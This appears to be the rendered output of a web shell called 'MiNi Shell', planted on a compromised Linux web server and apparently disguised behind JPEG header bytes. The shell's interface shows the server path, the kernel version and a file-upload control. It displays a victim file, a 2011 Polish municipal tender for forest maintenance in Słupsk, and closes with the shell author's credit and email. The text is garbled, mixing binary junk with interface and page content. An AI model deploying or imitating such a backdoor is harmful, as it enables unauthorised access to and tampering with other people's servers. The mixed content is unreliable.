JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110316/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110316/45450-N-2011.html

<p class="kh_header"><b>Słupsk: Bieżące utrzymanie lasów komunalnych Gminy Miejskiej Słupsk, zaliczonych do lasów     
    ochronnych o łącznej powierzchni 146,77 ha.</b><br>
<b>Numer ogłoszenia: 45450 - 2011; data zamieszczenia: 16.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Terenów Zieleni Miejskiej i Cmentarzy Komunalnych w Słupsku , ul. Kaszubska 4, 76-200 Słupsk, woj. pomorskie, tel. 059 8413722, 059 8481451, faks 059 8413723.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ztzmick.slupsk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bieżące utrzymanie lasów komunalnych Gminy Miejskiej Słupsk, zaliczonych do lasów     
    ochronnych o łącznej powierzchni 146,77 ha..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> rzedmiot zamówienia  dotyczy  zarówno  prac  z  zakresu  hodowli  lasu,  ochrony  lasu  jak  i  prac  
     porządkowych i  obejmuje: 
 1) cięcia  użytków  przedrębnych  w postaci: trzebieży selekcyjnych obejmujących trzebież  wczesną i późną
     oraz  cięć  sanitarnych obejmujących usuwanie drzew zaatakowanych przez szkodniki pierwotne i wtórne,
     wywrotów    i    wiatrołomów,    śniegołomów,    suchoczubów   i   posuszu   o   łącznej    masie   grubizny
   do  pozyskania wynoszącej  250 m3,  łącznie z wyznaczaniem drzew do usunięcia wspólnie z pracownikiem
    ZTZMiCK   -   specjalistą    ds.   lasów ,    zrywką,    załadunkiem    i   wywozem    drewna    na   magazyn
    na    odległość  do  7,5  km,   ułożeniem   w   stosy    w  magazynie,  utylizacją  gałęzi  oraz   uprzątnięciem
    po wycince  wszelkich   pozostałości,
 2) cięcia użytków rębnych w postaci rębni częściowych, gniazdowych lub stopniowych o łącznej   miąższości
     grubizny do  pozyskania  wynoszącej  100 m3;  wraz  ze  zrywką,  załadunkiem  i  wywozem  na  magazyn
     na odległość do 7,5 km, ułożeniem w stosy w magazynie, utylizacją gałęzi oraz  uprzątnięciem po wycince 
     wszelkich pozostałości,
3) odnowienie lasu poprzez: 
    a) przygotowanie   terenu    pod   odnowienia  naturalne w  postaci  oczyszczenia  trenu,  wyorania   pasów
        na   łącznej powierzchni  1 ha
       b) dokonanie odnowienia sztucznego  na  powierzchni 3,98  ha   poprzez  nasadzenie  gatunkami  sadzonek
            określonymi  w   aktualnym  uproszczonym planie urządzania lasu, zgodnie z typem siedliskowym lasu,
            po uprzednim usunięciu podszytu i przygotowaniu gleby wraz z zakupem materiału roślinnego,
 4) zabezpieczenie  upraw  przed  zwierzyną  poprzez  ogrodzenie  siatką  metalową  lub naprawę istniejącego
     ogrodzenia lub poprzez zastosowanie preparatu odstraszającego, 
5) pielęgnację upraw w formie dwukrotnego w okresie jednego sezonu wegetacyjnego wykaszania chwastów
    w  międzyrzędach   i   rzędach   na    powierzchni   2,57   ha,   w   terminie po raz pierwszy do 15  czerwca 
    i   po  raz  drugi  do  31  sierpnia   każdego   roku   i  na  pow.  4,98 ha   w  terminach  jak  wyżej  od  czasu
    odnowienia,
6) wprowadzenie   poprawek  i  uzupełnień   na    łącznej  powierzchni   zredukowanej  wynoszącej  1,19   ha 
  w  roku   2013  i  na  pow.  zredukowanej  wynoszącej  0,59  ha  w  2014  roku wraz z zakupem materiału    
   roślinnego, 
   7) odnowienie  pasów  przeciwpożarowych  (sześciokrotne)  na  długości  3900 m,  w  terminie  pierwszy raz 
         do 30  kwietnia i po raz drugi do 01 lipca każdego roku,    
   8) wykaszanie    samosiewów    z    linii    oddziałowych    o    długości    łącznej   1150   m  i  szerokości  4m
        na powierzchni 0,46 ha,  w terminie do 30 czerwca każdego roku,
  9) wykaszanie    terenów    przyległych   do   pasów   przeciwpożarowych   w  Lasku  Północnym  i  do  drogi,
      o  szerokości  do  4 m,  o  powierzchni  do  0,68 ha,  w  terminie  pierwszy  raz  do  30   czerwca, drugi raz 
      do 30 sierpnia każdego roku,
10) prowadzenie    patroli    przeciwpożarowych    na    całej   powierzchni   w   miarę   potrzeb   i   wystąpienia
      zagrożenia  pożarowego  w  terminie  od  końca  czerwca  do końca  września  każdego roku, średnio po 20
      objazdów   każdego   roku,   po   około   20  km   przez  1,5   godz.  po   uprzednim  uzgodnieniu  terminów
      ze zleceniodawcą,
11) montaż   i   demontaż   tablic  ostrzegawczych  (12 szt.)  między  innymi  zakazujących   wstępu   do   lasu 
      w   miarę  potrzeb  i wystąpienia zagrożenia pożarowego,       
12) usuwanie posuszu w koronach 15 szt drzew przy ciągach pieszych przy pomocy  podnośnika lub z drabiny,
      wraz z wywozem gałęzi do 5km i utylizacją,
13) czyszczenie 1 raz w roku budek lęgowych w liczbie 120 sztuk przez okres 3 lat,
14) zakup karmy dla ptakow wraz z rozwieszeniem jej na terenie lasów,
15) zbieranie   zanieczyszczeń  w  przy  ciągach spacerowych łącznie z opróżnianiem koszy i wywozem śmieci
       na   wysypisko   w   okresie  wiosenno  letnim  (kwiecień -  październik)   2 razy  w  tygodniu   i w okresie
      (listopad-marzec) 1 raz w tygodniu przez okres 3 lat,
16) usuwanie  nagromadzonych  zanieczyszczeń  w  lasach  (dzikich  wysypisk  itp.)  wraz  z wywozem śmieci
    na wysypisko, łącznie 10 razy po 1 tonie,
17) zbieranie  zanieczyszczeń  po  całym  lesie (146,77 ha) 1 raz w miesiącu od marca do grudnia przez okres 
    3 lat, wraz z wywozem śmieci na wysypisko, 
18) renowacja  i  naprawa  34 szt  koszy  na  śmieci,  35 szt  ławek   znajdujących  się   na  terenie  lasów 1 raz
       w roku, w terminie do 15 maja każdego roku,
19) wykonanie  i  montaż  nowych   koszy  w  ilości  10  szt  i  ławek  drewnianych  w  ilości 10 sztuk, w miarę
    potrzeb w terminie uzgodnionym ze zleceniodawcą,
20) bieżącą   naprawę  dróg   leśnych  poprzez  wyrównanie,  nawiezienie  i  rozplantowanie  oraz zagęszczenie
    żużlem, na powierzchni 3000m2.
21) odśnieżanie ciągów spacerowych na długości 4,6 km wLasku Południowym i na długości 3,7 km w Lasku 
       Północnym 2 razy w miesiącach od grudnia do lutego włącznie każdego roku..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający  może  udzielić  zamówienia  uzupełniającego,  o  którym  mowa  w  art.  67 ust 6 i 7 ustawy - 
 Prawo  zamówień  publicznych  dotychczasowemu  Wykonawcy, stanowiącego nie więcej niż 20% wartości 
  zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 77.20.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 05.05.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.  Przed złożeniem oferty Wykonawca powinien wnieść wadium w kwocie:
2.000,00 zł (dwa tysiące złotych) w terminie do dnia 24 marca 2011r. do godz 10oo.          
2. Wadium winno być wniesione w formie określonej  z art. 45 ust 6 ustawy - Prawo zamówień  
    publicznych.
                Jeżeli wadium będzie wniesione w pieniądzu , winno być wpłacone na rachunek bankowy ZTZMiCK
                w Słupsku PEKAO S.A. Nr 80124037701111000040698322.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) posiadają  zezwolenie  na  prowadzenie  działalności  w  zakresie odbierania odpadów  komunalnych 
             od właścicieli nieruchomości,
         b) posiadają zezwolenie na prowadzenie działalności w zakresie transportu odpadów,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz   wykonanych
   w ostanich 3 latach co najmniej 4 zadań związanych z przedmiotem zamówienia, których łączna wartość jest
   nie  mniejsza niż  100.000 zł   wraz  z  dokumentami potwierdzającymi należyte wykonanie tych  usług.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykażą  co najmniej na stanie:
         a) 5 pilarek do drewna,
         b) 1 urządzenie do zrywki drewna, 
         c) 1 rębak do gałęzi,
         d) 1 samochód dostawczy,
         e) ciągnik z przyczepą,
         f) 1 frezarkę do pni,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaże, że wśród osób wykonujących zamówienie co najmniej
    jedna  osoba  ma  wykształcenie  średnie  lub  wyższe  leśne  z  minimum  5-letnim  stażem  pracy  w  lasach
   ochronnych   oraz zatrudnia  co 
    najmniej 3 pilarzy wraz  z  załączeniem stosownych dokumentów dotyczących  ich kwalifikacji 
    zawodowych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)oświadczenie o przyjęciu warunków przetargu i treści umowy stanowiące integralną część specyfikacji - załącznik nr 4,
b)a)wypełniony wzór umowy - załącznik nr 7,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający  dopuszcza  możliwość zmiany  postanowień zawartej umowy w stosunku do treści oferty,
    na   podstawie   której   dokonano   wyboru  Wykonawcy  w  zakresie:  zmiany  częstotliwości  i  miejsca
    wykonywania    prac,    ustawowej    zmiany    stawki    podatku    VAT ,   zmniejszenia    zakresu  usług, 
    zmniejszenia dofinansowania z Gminy Miejskiej Słupsk.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ztzmick.slupsk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Terenów Zieleni Miejskiej i Cmentarzy Komunalnych w Słupsku
ul. Rabina dr. Maxa Josepha 4
76-200 Słupsk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.03.2011 godzina 10:00, miejsce: Zarząd Terenów Zieleni Miejskiej i Cmentarzy Komunalnych w Słupsku
ul. Rabina dr. Maxa Josepha 4
76-200 Słupsk.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com